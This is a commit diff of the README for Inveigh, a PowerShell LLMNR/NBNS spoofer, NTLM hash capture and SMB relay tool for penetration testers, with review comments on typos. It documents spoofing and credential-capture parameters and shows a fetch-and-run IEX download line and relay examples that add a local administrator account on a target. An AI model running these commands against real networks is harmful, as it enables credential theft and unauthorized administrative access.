path: root/README.md
author: Kevin Robertson <robertsonk@gmail.com> 2016-09-13 18:58:15 -0400
committer: Kevin Robertson <robertsonk@gmail.com> 2016-09-13 18:58:15 -0400
commit: 73e2f3d442fc63925fa79a980fbce9d5c8a571af
tree: 0dc9f25574b966418e93f8e56098820b8db97457 /README.md
parent: 747b0d1f2fff960e378776a3cdcc9fd857a387dc
Inveigh 1.21.2
1. Added Inveigh-Unprivileged.ps1 (replaces Inveigh-BruteForce.ps1) - This script contains only LLMNR/NBNS spoofing and hash capture methods that do not require local admin access. The NBNS spoofer can be used without disabling the local NBNS service. The LLMNR spoofer does require stopping (needs admin) the local service and freeing up port 5355. It will work without admin on a system with LLMNR disabled. Note that there can still be system configurations that will prevent Inveigh-Unprivileged from working, and require admin access to change (e.g. local firewall blocking traffic, LLMNR enabled). This script replaces Inveigh-BruteForce and contains the same functionality.

2. Inveigh.ps1 Updates - Added a learning mode (SpooferLearning parameter) to Invoke-Inveigh that will attempt to avoid spoofing requests for valid hostnames. If enabled, Inveigh will send out LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS requests. If Inveigh receives a response for a sent request, it will add the hostname to a blacklist. Added some code to help keep track of the SMB capture sequence. Removed the ability to launch Invoke-InveighRelay directly from an Invoke-Inveigh command line.

3. Inveigh-Relay.ps1 Status - This one is due for an overhaul. I'm also considering trying to convert it to not require admin access. No real changes on this pass though. It will work with either Invoke-Inveigh (-HTTP N and/or -HTTPS N) or Invoke-InveighUnprivileged (-HTTP N) as long as the target system supports SMB1.

4. Support Functions - Merged all of the small Get functions into Get-Inveigh.

5. Extras - Added an extras directory for functions that don't fit the main scripts.
   a. Send-NBNSResponse - This function sends a crafted NBNS response packet to a specific target. For name resolution to be successful, the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must have an external method (Wireshark, etc.) of viewing the required NBNS request fields for traffic on the target subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been able to get it to work manually by watching tshark with the transaction ID being listed in the output. Ideally, this function would be fed by another script.
   b. Send-LLMNResponse - Just like Send-NBNSResponse but even harder to use manually.
   c. Invoke-NBNSC2 - Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be sent from an NBNS enabled system on the same subnet using ping, etc.
Diffstat (limited to 'README.md')
-rw-r--r-- README.md | 293
1 file changed, 161 insertions, 132 deletions
diff --git a/README.md b/README.md
index 46afa85..f116581 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,42 @@
# Inveigh
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system.
-## Functions
+## Included In
+* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
+* PS>Attack - https://github.com/jaredhaight/psattack
+* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
+
+## Special Thanks
+* Anyone that posted .NET packet sniffing examples.
+* Responder - https://github.com/SpiderLabs/Responder
+* Impacket - https://github.com/CoreSecurity/impacket
+
+## Import
+* To import with Import-Module:
+ Import-Module ./Inveigh.psd1
+
+* To import using the dot source method:
+ . ./Inveigh.ps1
+ . ./Inveigh-BruteForce.ps1
+ . ./Inveigh-Relay.ps1
+
+* To load into memory using Invoke-Expression:
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1")
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
+
+## System Requirements
+* Tested minimums are PowerShell 2.0 and .NET 3.5
+
+## Functions
+* Invoke-Inveigh
+* Invoke-InveighUnprivileged
+* Invoke-InveighRelay
+* Clear-Inveigh
+* Get-Inveigh
+* Stop-Inveigh
+* Watch-Inveigh
+
### Invoke-Inveigh
* The main Inveigh LLMNR/NBNS spoofer function.
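Review bot: the dot-source import block in this hunk still lists `. ./Inveigh-BruteForce.ps1`, while the IEX block a few lines later loads `Inveigh-Unprivileged.ps1`, the new Functions list names `Invoke-InveighUnprivileged`, and the commit message says Inveigh-Unprivileged.ps1 replaces Inveigh-BruteForce.ps1; change that line to `. ./Inveigh-Unprivileged.ps1` so a reader following the dot-source instructions does not load a file that no longer ships. Smaller point: the Import-Module line points at `./Inveigh.psd1` while the one-line example later in this diff uses `Import-Module ./Inveigh.ps1`; pick one so readers are not left guessing whether the module manifest is required.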
@@ -20,101 +55,146 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
##### Notes:
* LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets.
* SMB challenge/response captures are performed by sniffing over the host system's SMB service.
+* The local LLMNR/NBNS services do not need to be disabled on the host system.
+* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+
+##### Examples:
+* To execute with default settings:
+ Invoke-Inveigh
+
+* To load and execute with one line:
+ Import-Module ./Inveigh.ps1;Invoke-Inveigh
+
+* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled.
+ Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y
+
+##### Screenshot:
+![inveigh](https://cloud.githubusercontent.com/assets/5897462/18420523/924f9c7a-7842-11e6-984e-153058b28016.png)
##### Parameters:
-* __IP__ - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
-* __SpooferIP__ - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
-* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
+* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
+* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning.
* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted.
+* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.
+* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
-* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
-* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
+* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
+* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests.
-* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
-* __HTTPDir__ - Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
-* __HTTPDefaultFile__ - Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
-* __HTTPDefaultEXE__ - Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
-* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
-* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
+* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
+* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
+* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
+* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
+* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
+* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
-* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
* __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
-* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __SMBRelay__ - Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory.
-* __SMBRelayTarget__ - IP address of system to target for SMB relay.
-* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
-* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
-* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
+* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
-### Invoke-InveighBruteForce
-* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.
+### Invoke-InveighUnprivileged
+* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access.
##### Privilege Requirements:
* Regular User
##### Features:
+* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service
+* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled
* Targeted IPv4 NBNS brute force spoofer with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP
+* Basic auth cleartext credential capture over HTTP
+* WPAD server capable of hosting a basic or custom wpad.dat file
+* HTTP server capable of hosting limited content
* Granular control of console and file output
* Run time control
-##### Notes:
-* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working.
+##### Notes:
+* The local NBNS service does not need to be disabled on the host system.
+* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system.
+* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June.
+
+##### Examples:
+* To execute with default settings:
+ Invoke-InveighUnprivileged
+
+* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes.
+ Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30
+
+##### Screenshot:
+![inveigh-unprivileged](https://cloud.githubusercontent.com/assets/5897462/18420530/a6645a02-7842-11e6-8d2c-bd5ff04813fe.png)
##### Parameters:
-* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.
-* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing.
-* __Hostname__ - Default = WPAD: Specify a hostname for NBNS spoofing.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
-* __NBNSPause__ Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
-* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host.
+* __SpooferTarget__ - IP address to target for brute force NBNS spoofing.
+* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
+* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
+* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
+* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
+* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
+* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
+* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer.
+* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-* __HTTPIP__ - Default = Any: Specify a TCP IP address for the HTTP listener.
-* __HTTPPort__ - Default = 80: Specify a TCP port for the HTTP listener.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests.
-* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary.
-* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
-* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+* __HTTPIP__ - Default = Any: IP address for the HTTP listener.
+* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
+* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
+* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary.
+* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
+* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
+* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
+* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunCount__ - Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
### Invoke-InveighRelay
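Review bot: both copy-pasteable examples in this hunk use `-ConsoleOutpuy Y` (the Invoke-Inveigh example and the Invoke-InveighUnprivileged example); PowerShell will fail parameter binding on the unknown name, so change both to `-ConsoleOutput Y`. Related, the Invoke-InveighUnprivileged parameter list removes the `ConsoleOutput` entry while its example and the `ConsoleUnique` description still refer to real time console output, so that removal looks accidental and the entry should come back. The `SpooferHostsReply` text says listed hostnames override the "whitelist created through SpooferLearning" while the `SpooferLearning` entry describes adding responders to a spoofing blacklist; use one term so readers know which way the override works. The Invoke-InveighUnprivileged notes say only that the local NBNS service need not be disabled, but the features list says the LLMNR spoofer runs only with the local LLMNR service disabled (and the commit message says stopping it needs admin); stating that in the notes would save an unprivileged run that silently never answers LLMNR. Recurring typos to fix in the same hunk: "LMMNR" (twice), "Interger" (twice), "WDAP" and "June 2016patches" (twice), "ceriticate", and "Inveigh Brute Force" left behind in the Invoke-InveighUnprivileged `OutputStreamOnly` line.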
@@ -127,16 +207,27 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* HTTP/HTTPS to SMB NTLMv2 relay with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
* Granular control of console and file output
-* Can be executed as either a standalone function or through Invoke-Inveigh
+
+##### Examples:
+* To execute with basic options:
+ Invoke-Inveigh -HTTP N
+ Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add"
+
+* To execute with and only perform SMB relay with the 'Administrator' account:
+ Invoke-InveighUnprivileged -HTTP N
+ Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator
+
+##### Screenshot:
+![inveigh-relay](https://cloud.githubusercontent.com/assets/5897462/18420526/9991a758-7842-11e6-90b2-9d519ff03c28.png)
##### Parameters:
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
+* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
+* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
* __SMBRelayTarget__ - IP address of system to target for SMB relay.
* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
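Review bot: the rewritten `+* __HTTPSCertAppID__` line carries the typo "ceriticate" over from the removed line; it should read `* __HTTPSCertAppID__ - Valid application GUID for use with the certificate.` While touching this block, the `__HTTPSCertThumbprint__` description says the parameter is a thumbprint but then requires a file named Inveigh.pfx in the working directory; state explicitly whether the thumbprint must match a certificate already in the store or the supplied Inveigh.pfx, since the HTTPS warning above tells the user to clean that store by hand if the script does not exit gracefully.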
@@ -146,82 +237,20 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+##### Notes:
+* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+
### Support Functions
-* __Get-Inveigh__ - Get queued console output
-* __Get-InveighCleartext__ - Get all captured cleartext credentials
-* __Get-InveighLog__ - Get log entries
-* __Get-InveighNTLMv1__ - Get all or unique (-unique) captured NTLMv1 challenge/response hashes
